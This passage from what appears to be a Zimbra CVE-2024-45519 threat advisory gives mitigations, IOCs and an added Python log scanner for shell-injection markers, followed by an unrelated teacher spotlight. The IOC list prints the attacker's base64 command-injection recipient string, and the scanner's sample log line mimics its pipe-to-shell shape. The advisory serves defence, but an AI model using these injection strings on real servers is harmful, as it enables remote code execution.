    • Implement comprehensive monitoring and logging to detect suspicious activities targeting the Zimbra postjournal service. Focus on identifying unusual email patterns, base64-encoded commands, or abnormal execution of commands through the postjournal service. Regular log reviews can help catch early signs of exploitation.
  • Access Control
    • Properly configure Zimbra’s “mynetworks” parameter to restrict access to trusted IP ranges only. If the postjournal service is not required for your organization’s operations, consider disabling it to reduce the attack surface, especially in environments where patching may be delayed.
  • Service Management
    • Ensure that optional services like postjournal, which is not enabled by default, remain disabled unless explicitly needed. On systems where postjournal is unnecessary, consider removing or disabling it entirely to minimize potential vulnerabilities.
  • Vendor Communication
    • Establish regular communication with Zimbra to stay informed about the latest security advisories, patches, and best practices. Regularly check the Zimbra Security Center and set up notifications to receive updates on new vulnerabilities and security patches promptly.

VI. IOCs (Indicators of Compromise)

  • IP Address: 79.124.49[.]86
  • Port: 10027
  • Base64-encoded String: ppp’echo${IFS}Li4vLj4vY29tbW9uL2Jpbi9jdXJsIGh0dHA6LY830S4xMjQuNDkuODY6NDQZL3RwdnRnYmp3ZWV2dnVvbWJ5d2xrdGhsbGpkdXB4Znlz|base64$(IFS)-di [email protected]
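The following detection helper is an added example illustrating the “Monitoring and Logging” recommendation above; it is not code from the advisory, from the Cyber Florida SOC, or from Zimbra. It scans mail-server and web-server log lines for the three things the advisory describes: shell metacharacters and base64 decode chains inside an SMTP recipient address (the CC-field injection), the JACTION cookie used to drive the web shell, and traffic involving the published IOC IP address. It assumes Postfix-style `to=<address>` fields in the mail log and a combined-format web log whose last quoted field holds the request cookies; every sample log line is constructed for the example, and the base64 blob in the sample recipient (`QUJD`, which decodes to the text `ABC`) only mimics the shape of the payload.

```python
"""Log scanner for indicators of CVE-2024-45519 exploitation (added example)."""
import re
from dataclasses import dataclass

# IOC IP published in the advisory (defanged there as 79.124.49[.]86).
IOC_IP = "79.124.49.86"

# Shell metacharacters and decode chains that never belong in an SMTP
# recipient address: command substitution, backticks, ${IFS}/$(IFS)
# whitespace tricks, and "| base64 -d" / "| sh" pipelines.
SHELL_MARKERS = re.compile(
    r"\$\(|`|\$\{IFS\}|\$\(IFS\)|\|\s*base64\b|\|\s*sh\b",
    re.IGNORECASE,
)

# Postfix-style "to=<address>" field (assumed log format).
RECIPIENT_FIELD = re.compile(r"\bto=<([^>]*)>")

# The web shell in the advisory is controlled through JSESSIONID and
# JACTION cookies; a JACTION cookie is not sent by legitimate clients.
WEBSHELL_COOKIE = re.compile(r"\bJACTION=")


@dataclass
class Finding:
    line_no: int
    reason: str
    excerpt: str


def is_suspicious_recipient(address: str) -> bool:
    """True if an SMTP recipient address carries shell-injection markers."""
    return SHELL_MARKERS.search(address) is not None


def scan_lines(lines):
    """Return a Finding for every log line that matches one of the indicators."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        for addr in RECIPIENT_FIELD.findall(line):
            if is_suspicious_recipient(addr):
                findings.append(
                    Finding(line_no, "shell markers in recipient address", addr)
                )
        if WEBSHELL_COOKIE.search(line):
            findings.append(Finding(line_no, "JACTION cookie (web shell C2)", line[:80]))
        if IOC_IP in line:
            findings.append(Finding(line_no, f"traffic involving IOC IP {IOC_IP}", line[:80]))
    return findings


# Constructed sample log lines (not real captures). Line 2 mimics the
# injection shape from the advisory with a harmless base64 blob ("QUJD" -> "ABC");
# line 4 is a web request carrying the web-shell cookie; line 5 is a firewall
# log entry for a connection to the IOC IP.
SAMPLE_LOGS = [
    "Oct  1 10:22:03 mail postfix/smtpd[2411]: 7A1B2C: client=unknown[203.0.113.9], from=<sender@example.org>",
    "Oct  1 10:22:03 mail postfix/smtpd[2411]: 7A1B2C: to=<ppp`echo${IFS}QUJD|base64${IFS}-d|sh`@mail.example.com>, status=sent",
    "Oct  1 10:22:05 mail postfix/smtpd[2412]: 7A1B2D: to=<bob@mail.example.com>, status=sent",
    '203.0.113.9 - - [01/Oct/2024:10:25:11 -0400] "POST /zimbraAdmin/ HTTP/1.1" 200 512 "-" "curl/8.4.0" "JSESSIONID=abc123; JACTION=Y2Q="',
    "Oct  1 10:26:40 mail kernel: OUTBOUND_DENY SRC=10.0.0.20 DST=79.124.49.86 PROTO=TCP DPT=443",
]

if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LOGS):
        print(f"line {f.line_no}: {f.reason}: {f.excerpt}")
```

Running the block against the constructed sample flags three of the five lines. In production the recipient check is the most valuable one, because a recipient address containing backticks, `$(`, `${IFS}` or a `| base64 -d` chain is malformed regardless of the payload it carries, so the rule does not depend on knowing the attacker’s encoded command in advance.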

VII. References

Dark Reading. (October 1, 2024). Zimbra RCE Vuln Under Attack Needs Immediate Patching. https://www.darkreading.com/cyberattacks-data-breaches/recent-zimbra-rce-under-attack-patch-now

BleepingComputer. (October 2, 2023). Critical Zimbra RCE flaw exploited to backdoor servers using emails. https://www.bleepingcomputer.com/news/security/critical-zimbra-rce-flaw-exploited-to-backdoor-servers-using-emails/

SOCRadar. (October 2, 2024). RCE Vulnerability in Zimbra (CVE-2024-45519). https://socradar.io/rce-vulnerability-in-zimbra-cve-2024-45519/

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Yousef Blassy, Thiago Reis Pagliaroni, Benjamin Price

October 28, 2024

Teacher Spotlight: Tina Vieira

Teacher: Tina Vieira

School: Nature Coast Technical High School

County: Hernando

With 19 years of dedicated experience in Hernando County Schools, Tina Vieira has made a remarkable impact on education. Throughout her career, Tina has taught multiple subjects, served as a district writing coach and ESOL compliance specialist, and helped develop new computer science standards in collaboration with the Department of Education.

Driven by her commitment to technology education, Tina transitioned to computer science and now leads a range of technology courses at Nature Coast Technical High School. Her influence goes beyond the classroom, as she also trains educators across Florida, helping shape the future of computer science education statewide.

Tina’s passion for empowering students shines through in her words: “Seeing kids learn skills that are not only in high demand but will also set them up for a successful future is incredibly rewarding for me.” Her dedication to fostering student growth and success is evident in her students’ involvement in cyber competitions.

Beyond her professional achievements, Tina enjoys spending time on the water with her family.

Her commitment to cybersecurity education and student success is truly commendable. Thank you, Tina, for your invaluable contributions!

Would you like to be featured in our Teacher Spotlight? To nominate yourself or another deserving teacher, complete the interest form below!

October 25, 2024